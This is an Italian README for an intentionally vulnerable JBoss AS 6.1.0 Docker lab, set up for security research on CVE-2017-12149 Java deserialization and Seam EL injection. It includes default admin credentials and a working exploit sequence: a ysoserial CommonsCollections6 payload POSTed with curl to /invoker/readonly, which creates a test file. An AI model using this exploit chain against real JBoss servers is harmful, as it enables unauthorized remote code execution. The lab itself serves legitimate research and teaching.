
Laboratorio di ricerca containerizzato JBoss AS 6.1.0 per dimostrare vulnerabilità Java Deserialization (CVE-2017-12149) e JBoss Seam EL Injection con fasi di verifica dell'exploit preconfigurate.
Molte industrie critiche (bancarie, sanitarie e manifatturiere) si affidano a middleware legacy progettati per funzionare specificamente su JBoss 5 o 6. Poiché queste applicazioni sono spesso troppo fragili per essere migrate a versioni moderne di WildFly (il successore di JBoss), le organizzazioni scelgono di "air-gap" o nasconderle dietro VPN piuttosto che aggiornarle. Quando le difese perimetrali vengono violate, la vulnerabilità è ancora presente, viva e non corretta.
Questo repository fornisce un ambiente JBoss Application Server 6.1.0 containerizzato, configurato specificamente per la ricerca sulla sicurezza e la verifica delle vulnerabilità. È progettato per dimostrare le vulnerabilità di deserializzazione Java e di iniezione EL di JBoss Seam.
Per garantire che le credenziali personalizzate e le configurazioni siano applicate correttamente, costruisci il container da zero:
docker-compose build --no-cache
docker-compose up -d
Console JBoss: http://localhost:8080/admin-console/
Nome utente: admin
Password: admin
Verified Vulnerabilities
Il percorso di exploit più affidabile in questo ambiente è attraverso HTTPServerILServlet situato in /invoker/readonly.
Passaggi di verifica:
Genera un payload usando ysoserial per creare un file in /tmp:
java -jar ysoserial-all.jar CommonsCollections6 "touch /tmp/pwned" > poc.ser
Invia il payload binario tramite curl:
curl -v -X POST --data-binary @poc.ser http://localhost:8080/invoker/readonly
Conferma che l'exploit ha funzionato:
docker exec -it jboss-custom-lab ls /tmp/pwned
Questo ambiente è intenzionalmente vulnerabile. Contiene software non aggiornato e giunto a fine vita.
NON distribuire questo ambiente su un server pubblico.
NON utilizzare questi strumenti su sistemi per cui non hai esplicita autorizzazione al test.
Sviluppato a scopo educativo e per la ricerca sulla sicurezza.
Dipendenze: https://github.com/frohoff/ysoserial